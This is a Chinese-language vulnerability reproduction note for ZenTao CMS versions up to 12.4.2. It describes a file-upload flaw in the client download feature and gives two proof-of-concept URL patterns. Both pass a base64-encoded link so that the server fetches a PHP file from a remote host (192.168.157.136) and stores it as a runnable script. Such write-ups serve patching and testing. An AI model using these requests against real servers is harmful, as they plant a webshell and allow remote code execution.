1.影响版本
<=12.4.2
2.漏洞描述
禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。
3.漏洞POC
1)http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html
2)http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]
4.复现准备:
远程服务器:192.168.157.136
恶意文件地址:http://192.168.157.136/test/test.php
test.php:
<?php echo "<?php phpinfo();?>";
5.漏洞复现
1)对http头使用大写,且对恶意文件地址base64加密
2)登录禅道后台,使用POC1方法
3)版本添加成功
4)在文件上传位置zentaopms\www\data\client\1查看上传的文件,在浏览器访问上传成功的test.php文件